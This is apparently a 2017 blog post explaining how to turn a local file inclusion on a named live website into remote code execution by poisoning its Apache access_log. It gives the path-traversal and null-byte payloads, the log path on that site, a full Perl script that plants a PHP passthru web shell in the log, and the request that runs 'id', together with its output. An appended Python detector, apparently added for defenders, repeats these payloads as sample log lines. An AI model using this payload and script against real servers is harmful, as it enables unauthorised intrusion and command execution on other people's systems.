
LFI to RCE via access_log injection

NoGe
Jun 6, 2017 · 2 min read

Hi guys

Just wanna share a trick from Local File Inclusion/File Path Traversal to
Remote Code Execution by injecting the access_log.

I have a target http://proqualitycontrol.com/index.php?page=aboutus and it’s vulnerable to LFI/FPT. It’s a live website. Inject the target with the
../../../../../../../../../../../../../../../etc/passwd%00 payload.

Now change the payload to /etc/httpd/conf/httpd.conf. Not every httpd.conf is at this path.
To find the access_log location you need to find httpd.conf first.

View source (ctrl+u) for a better view of their httpd.conf.

Open the file called access_log. In this case
/home/pro_99/proqualitycontrol.com/access_log.

My friend @paceander coded this perl script to inject the access_log.

#!/usr/bin/perl -w

use IO::Socket::INET;

my $host = $ARGV[0];
my $port = $ARGV[1];

print "*** Injecting $host:$port access log...\n";

my $rce = "<?if(get_magic_quotes_gpc()){ \$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);?>";
$sock = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>"tcp") || die "Cant connect to $host:$port!\n";
print $sock "GET /v0pcr3w ".$rce." HTTP/1.1\r\n";
print $sock "Host: ".$host."\r\n";
print $sock "Connection: close\r\n\r\n";
close($sock);

print "*** Done!\n\n";

Or you can download it here

Run it “perl log.pl <target> 80”

Open the access_log again and search for v0pcr3w. If the word is there then
we’ve successfully injected the access_log.

Now run this line to execute a command on the server:
/home/pro_99/proqualitycontrol.com/access_log%00&cmd=id and
you’ll see the “id” command executed.

Our command executed successfully: GET /v0pcr3w uid=48(apache)
gid=48(apache) groups=48(apache),500(webadmin).
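
Each step above leaves a recognisable line in access_log, which is what a defender can hunt for. The following Python script is an added example, not part of the original post: it flags traversal and null-byte probes, PHP code written into the log, and a log file passed as a parameter value. The sample log lines, client addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined format: host ident user [time] "request" status size [rest]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "((?:[^"\\]|\\.)*)" (\d{3}) \S+(.*)$')
PHP_TAG = re.compile(r'<\?')  # PHP open tag (<?, <?php, <?=) has no place in a log line
LOG_PATH = re.compile(r'=[^&\s]*(?:access|error)[_.-]?log', re.I)  # log path as a parameter value

# Constructed sample lines modelled on the requests in this write-up (documentation IPs).
SAMPLE = [
    '203.0.113.5 - - [06/Jun/2017:10:00:01 +0000] "GET /index.php?page=aboutus HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Jun/2017:10:01:12 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1843',
    '203.0.113.9 - - [06/Jun/2017:10:03:40 +0000] "GET /v0pcr3w <?if(get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);} passthru($_GET[cmd]);?> HTTP/1.1" 404 210',
    '203.0.113.9 - - [06/Jun/2017:10:04:02 +0000] "GET /index.php?page=/home/pro_99/proqualitycontrol.com/access_log%00&cmd=id HTTP/1.1" 200 90211',
]

def classify(line):
    """Return the set of findings for one access_log line."""
    m = LOG_RE.match(line)
    if not m:
        return {"unparsed"}
    request, rest = m.group(2), m.group(4)
    decoded = unquote(unquote(request))  # decode twice to catch double URL-encoding
    findings = set()
    if PHP_TAG.search(decoded) or PHP_TAG.search(unquote(rest)):
        findings.add("php-code-in-log")        # poisoning: request line, Referer or User-Agent
    if "../" in decoded or "..\\" in decoded:
        findings.add("path-traversal")
    if "\x00" in decoded:
        findings.add("null-byte")              # %00 used to cut off an appended extension
    if LOG_PATH.search(decoded):
        findings.add("log-file-as-parameter")  # the include step that runs the poisoned log
    return findings

def scan(lines):
    """Return (line_number, client, sorted findings) for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = classify(line)
        if found:
            hits.append((n, line.split(" ", 1)[0], sorted(found)))
    return hits

if __name__ == "__main__":
    for n, client, found in scan(SAMPLE):
        print(f"line {n} {client}: {', '.join(found)}")
```

A "php-code-in-log" hit followed by a "log-file-as-parameter" hit from the same client is the sequence described in this post and should be treated as a likely compromise rather than a probe.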

Note: The web administrator has been notified about this vulnerability.

That's all guys, happy hacking!
